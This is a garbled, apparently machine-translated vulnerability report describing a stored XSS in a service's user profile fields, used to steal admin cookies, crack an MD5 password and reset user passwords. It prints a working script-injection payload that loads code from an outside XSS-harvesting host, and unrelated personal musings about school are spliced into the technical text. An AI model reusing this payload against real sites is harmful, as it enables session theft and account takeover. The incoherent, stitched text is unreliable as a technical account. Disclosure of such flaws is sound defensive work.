When an XSS occurs in a blind input box, when an XSS session expires, or when the session expires, the cookie statement is incorrect. Go to the background and reset any user password. How many images of the website will all be suspended? How many websites will be implicated? I started school again and had a lot of thoughts. There are still more than 1000 days before the college entrance examination. I miss my friends and classmates and don't know how to live in the future. After the college entrance examination, is it a matter of praise and return is a pity? Or, I thought too much. I am waiting for any user password Modification Vulnerability. Do students of maxcompute see them at the architect's meeting? For details, I have already said this XSS with Alibaba Cloud. It seems that I have already completed the XSS and deleted it. <and "I am bringing up a score together with the following vulnerabilities ~ The previous test account has not been deleted, but is disabled. It is still displayed in the background, and the XSS code is also displayed. Today, I went to the XSS list and found the UPYUN address. So I went to toss his COOKIES and found that, the user's account is recorded in COOKIES in plaintext and password in MD5 32-Bit mode ..... so I entered the background with the correct password and found that the user password can be reset. What are the consequences of the reset ~~ Proof of vulnerability: 1. Apply for an account for free and write the XSS code in your personal information. "> <Script src = http://xsser.me/pIQKKz> </script> 2. When the management sees my information ~ 3. When I use COOKIES and address spoofing to log on, I am depressed. The session is invalid. 4. When I was depressed, I looked at the COOKIES and found something strange, I decoded it with URIComp and found a password field. It is a 32-bit MD5 encrypted field. Therefore, the fee is charged for the value of limit 5. After a round of cracking, I knew the password, and it seemed like a weak password... 5. After that, I successfully entered the background with various functional mobile phones ======
Solution: the background does not allow public Optimization of COOKIES on the public network? Which of the following websites do you have seen that COOKIES contain passwords? Do not use weak passwords in the company. Change strong passwords ~ Don't deduct your salary. Otherwise he will blame me.